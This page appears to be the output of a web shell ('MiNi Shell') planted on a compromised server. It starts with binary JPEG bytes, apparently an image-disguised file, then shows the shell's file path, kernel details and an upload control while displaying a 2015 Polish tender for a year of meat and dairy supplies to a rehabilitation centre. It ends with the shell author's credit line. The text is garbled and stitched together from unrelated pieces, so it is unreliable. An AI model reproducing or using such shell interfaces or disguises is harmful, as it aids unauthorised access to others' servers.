JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150313/55950-N-2015.html

<p class="kh_header"><b>Iwonicz Zdrój: Dostawa artykułów spożywczych w ciągu jednego roku w następujących asortymentach : 1. Mięso i wędliny. 2. Mleko i produkty nabiałowe.</b><br>
<b>Numer ogłoszenia: 55950 - 2015; data zamieszczenia: 13.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego , ul. Ks. Jana Rąba 22, 38-440 Iwonicz Zdrój, woj. podkarpackie, tel. 013 4350612, faks 013 4350612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> crriwonicz.sanatoria.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych w ciągu jednego roku w następujących asortymentach : 1. Mięso i wędliny. 2. Mleko i produkty nabiałowe..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych w ciągu jednego roku w następujących asortymentach : 1. Mięso i wędliny. 2. Mleko i produkty nabiałowe.
Asortyment 1. Mięso i wędliny.
1.	Salceson drobiowy			48 kg
2.	Salceson wiejski			110 kg
3.	Pasztet drobiowy pieczony		160 kg
4.	Kaszanka wiejska			320 kg
5.	Kiełbasa drobiowa podsuszana	135 kg
6.	Kiełbasa głogowska			5 kg
7.	Kiełbasa swojska			70 kg
8.	Kiełbasa podwawelska		40 kg
9.	Kiełbasa szynkowa			30 kg
10.	Kiełbasa zwyczajna			340 kg
11.	Kiełbasa krakowska sucha		75 kg
12.	Kiełbasa krakowska parzona		100 kg
13.	Kiełbasa toruńska			410 kg
14.	Kiełbaski drobiowe coctailowe	250 kg
15.	Parówka drobiowa			800 kg
16.	Parówka firmowa			40 kg
17.	Parówka gruba			10 kg
18.	Parówki serdelki			80 kg
19.	Polędwica drobiowa		80 kg
20.	Polędwica sopocka			120 kg
21.	Schab pieczony z przyprawami	155 kg
22.	Baleron wieprzowy			52 kg
23.	Baleron drobiowy			100 kg
24.	Bekon			             105 kg
25.	Szynka z drobiu			70 kg
26.	Szynka biała			100 kg
27.	Szynka konserwowa		75 kg
28.	Szynka wieprzowa gotowana		570 kg
29.	Szynka domowa			125 kg
30.	Szynka wiejska			100 kg
31.	Szynka ogonówka			170 kg
32.	Szynka tradycyjna			175 kg
33.	Szynka tyrolska			45 kg
34.	Kabanosy drobiowe			100 kg
35.	Kabanosy wieprzowe		20 kg
36.	Filet królewski z indyka		125 kg
37.	Filet drobiowy w galarecie		32 kg
38.	Boczek faszerowany		50 kg
39.	Boczek wędzony b/kości		80 kg
40.	Boczek gotowany b/kości		280 kg
41.	Mortadela drobiowa		100 kg
42.	Pieczeń chlebowa			110 kg
43.	Pieczeń szynkowa			10 kg
44.	Lencz			120 kg
45.	Smaczek konserwowy		34 kg
46.	Gulasz angielski blok		12 kg
47.	Baton drobiowy			45 kg
48.	Wątroba drobiowa			120 kg
49.	Wątroba wieprzowa		120 kg
50.	Łopatka wieprzowa b/kości		730 kg
51.	Karkówka wieprzowa b/kości		1.400 kg
52.	Schab b/kości			680 kg
53.	Żeberka wieprz. /paski/		280 kg
54.	Wołowe b/kości udziec		630 kg
55.	Filet drobiowy			1.230 kg
56.	Udko kurczaka			2.050 kg
57.	Udziec drobiowy			10 kg
58.	Kości pokrzepowe			1.000 kg
59.	Porcje rosołowe			1.100 kg
60.	Słonina			125 kg

Asortyment II : Mleko i produkty nabiałowe:
Ser topiony 25g :				
śmietankowy				2.700 szt
z szynką 				2.700 szt
mix 				2.700 szt
Twaróg pakowany próżniowo w folię ok. 1kgpółtłusty 				1.940 kg
Serek  ( od 100 g -150g)				
ziarnisty				2.000 szt
naturalny				2.000 szt
owocowy dla dzieci50g  (Danonki lub równoważne)				660 szt
Ser topiony (plastry) paczka 0,15 kg( różne smaki )				1.530 szt
Ser żółty (półtłusty - nie seropodobny)				
salami				200 kg
gouda				200 kg
edamski				200 kg
rolada ustrzycka				200 kg
Mleko 2%  0,9 l				13.000 szt
śmietana 18% kubek (330-400g)				1.950 szt
Śmietana 30%kubek (400-450g)				15 szt
Śnieżka w aerozolu				300 szt
Masło  82% tłuszczu mlecznego  (0,2 kg)				1.950 kg
Jogurt (125-150g )  Jogobella, Danon, Zott, Bakoma  lub równoważny 				
naturalny				100 szt
bez cukru				60 szt
z ziarnami zbóż				1.500 szt
owocowe różne smaki  				1.500 szt
do picia				1.500 szt
z syropem 				1.500 szt
z dodatkami : owoce, czekolada, płatki, kulki				1.500 szt
Tłuszcz roślinny do smażenia /utwardzony / 200 g				170 kg
Margaryna ( 250 g )				400 kg
Ser typu fromage / 80-100g/				1.850 szt
Kefir (400)				10 szt
Jogurt naturalny (masa netto 400g )				360 szt
Olej 1l :				
uniwersalny				190 szt
rzepakowy				190 szt
Smalec /200g 				420kg
Napój mleczny z bakteriami L.Casei(Actimel lub równoważny)				700 szt
Deser mleczny czekoladowy (100g) (Monte deser lub równoważny)				290 szt
Deser mleczny  czekoladowy (55g)(Monte deser lub równoważny)				290 szt.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.13.00.00-8, 15.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy - załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy - załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełniania ww. warunku : oświadczenie wykonawcy, że  samochód, którym będzie dostarczał przedmiot zamówienia  odpowiada wymaganiom sanitarnym, określonym ustawą z dnia 25.08.2006r. o bezpieczeństwie żywności i żywienia (Dz.U.2010.136.poz.914 ze zm.)  w związku z rozporządzeniem nr 852/2004 Parlamentu Europejskiego  i Rady UE z nia 29.04.2004r. (ogólne wymogi higieny dla wszystkich przedsiębiorstw sektora spożywczego).- oświadczenie w załączeniu do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy - załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy - załącznik nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony i podspisanu formularz ofertowy, 2. parafowany przez wykowacę projekt umowy, 3. wypełniony i podpisany formularz cenowy, 4. podpisane warunki współpracy,5. oświadczenie o podwykonawcach</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach : 
1.	wystąpienia okoliczności skutkujących  koniecznością zmiany terminu realizacji zamówienia,
2.	wystąpienia zmiany przepisów prawa w zakresie realizacji przedmiotu zamówienia i konieczności dostosowania do nich zapisów umowy,
3.	w przypadku zmiany stawek podatku od towaru i usług VAT, skutkujących koniecznością  zmian y wynagrodzenia,
4.	wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania SIWZ i podpisywania umowy, a które są niezbędne do prawidłowej realizacji zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> crriwonicz.sanatoria.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Rehabilitacji Rolników KRUS w Iwoniczu-Zdroju. ul. ks.Jana Rąba 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2015 godzina 09:00, miejsce: Centrum Rehabilitacji Rolników KRUS w Iwoniczu-Zdroju. ul. ks.Jana Rąba 22 , pokój 112.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa Mięsa i wędlin w ciągu jednego roku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Salceson drobiowy			48 kg
2.	Salceson wiejski			110 kg
3.	Pasztet drobiowy pieczony			160 kg
4.	Kaszanka wiejska			320 kg
5.	Kiełbasa drobiowa podsuszana			135 kg
6.	Kiełbasa głogowska			5 kg
7.	Kiełbasa swojska			70 kg
8.	Kiełbasa podwawelska			40 kg
9.	Kiełbasa szynkowa			30 kg
10.	Kiełbasa zwyczajna			340 kg
11.	Kiełbasa krakowska sucha			75 kg
12.	Kiełbasa krakowska parzona			100 kg
13.	Kiełbasa toruńska			410 kg
14.	Kiełbaski drobiowe coctailowe			250 kg
15.	Parówka drobiowa			800 kg
16.	Parówka firmowa			40 kg
17.	Parówka gruba			10 kg
18.	Parówki serdelki			80 kg
19.	Polędwica drobiowa			80 kg
20.	Polędwica sopocka			120 kg
21.	Schab pieczony z przyprawami			155 kg
22.	Baleron wieprzowy			52 kg
23.	Baleron drobiowy			100 kg
24.	Bekon			105 kg
25.	Szynka z drobiu			70 kg
26.	Szynka biała			100 kg
27.	Szynka konserwowa			75 kg
28.	Szynka wieprzowa gotowana			570 kg
29.	Szynka domowa			125 kg
30.	Szynka wiejska			100 kg
31.	Szynka ogonówka			170 kg
32.	Szynka tradycyjna			175 kg
33.	Szynka tyrolska			45 kg
34.	Kabanosy drobiowe			100 kg
35.	Kabanosy wieprzowe			20 kg
36.	Filet królewski z indyka			125 kg
37.	Filet drobiowy w galarecie			32 kg
38.	Boczek faszerowany			50 kg
39.	Boczek wędzony b/kości			80 kg
40.	Boczek gotowany b/kości			280 kg
41.	Mortadela drobiowa			100 kg
42.	Pieczeń chlebowa			110 kg
43.	Pieczeń szynkowa			10 kg
44.	Lencz			120 kg
45.	Smaczek konserwowy			34 kg
46.	Gulasz angielski blok			12 kg
47.	Baton drobiowy			45 kg
48.	Wątroba drobiowa			120 kg
49.	Wątroba wieprzowa			120 kg
50.	Łopatka wieprzowa b/kości			730 kg
51.	Karkówka wieprzowa b/kości			1.400 kg
52.	Schab b/kości			680 kg
53.	Żeberka wieprz. /paski/			280 kg
54.	Wołowe b/kości udziec			630 kg
55.	Filet drobiowy			1.230 kg
56.	Udko kurczaka			2.050 kg
57.	Udziec drobiowy			10 kg
58.	Kości pokrzepowe			1.000 kg
59.	Porcje rosołowe			1.100 kg
60.	Słonina			125 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mleka i produktów nabiałowych w ciągu jednego roku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ser topiony 25g :						
	śmietankowy				2.700 szt		
	z szynką 				2.700 szt		
	mix 				2.700 szt		
2	Twaróg pakowany próżniowo w folię ok. 1kgpółtłusty 				1.940 kg		
3	Serek  ( od 100 g -150g)						
	ziarnisty				2.000 szt		
	naturalny				2.000 szt		
	owocowy dla dzieci50g  (Danonki lub równoważne)				660 szt		
4	Ser topiony (plastry) paczka 0,15 kg( różne smaki )				1.530 szt		
5	Ser żółty (półtłusty - nie seropodobny)						
	salami				200 kg		
	gouda				200 kg		
	edamski				200 kg		
	rolada ustrzycka				200 kg		
6	Mleko 2%  0,9 l				13.000 szt		
7	śmietana 18% kubek (330-400g)				1.950 szt		
8	Śmietana 30%kubek (400-450g)				15 szt		
9	Śnieżka w aerozolu				300 szt		
10	Masło  82% tłuszczu mlecznego  (0,2 kg)				1.950 kg		
11	Jogurt (125-150g )  Jogobella, Danon, Zott, Bakoma  lub równoważny 						
	naturalny				100 szt		
	bez cukru				60 szt		
	z ziarnami zbóż				1.500 szt		
	owocowe różne smaki  				1.500 szt		
	do picia				1.500 szt		
	z syropem 				1.500 szt		
	z dodatkami : owoce, czekolada, płatki, kulki				1.500 szt		
12	Tłuszcz roślinny do smażenia /utwardzony / 200 g				170 kg		
13	Margaryna ( 250 g )				400 kg		
14	Ser typu fromage / 80-100g/				1.850 szt		
15	Kefir (400)				10 szt		
16	Jogurt naturalny (masa netto 400g )				360 szt		
17	Olej 1l :						
	uniwersalny				190 szt		
	rzepakowy				190 szt		
18	Smalec /200g 				420kg		
19	Napój mleczny z bakteriami L.Casei(Actimel lub równoważny)				700 szt		
20	Deser mleczny czekoladowy (100g) (Monte deser lub równoważny)				290 szt		
21	Deser mleczny  czekoladowy (55g)(Monte deser lub równoważny)				290 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com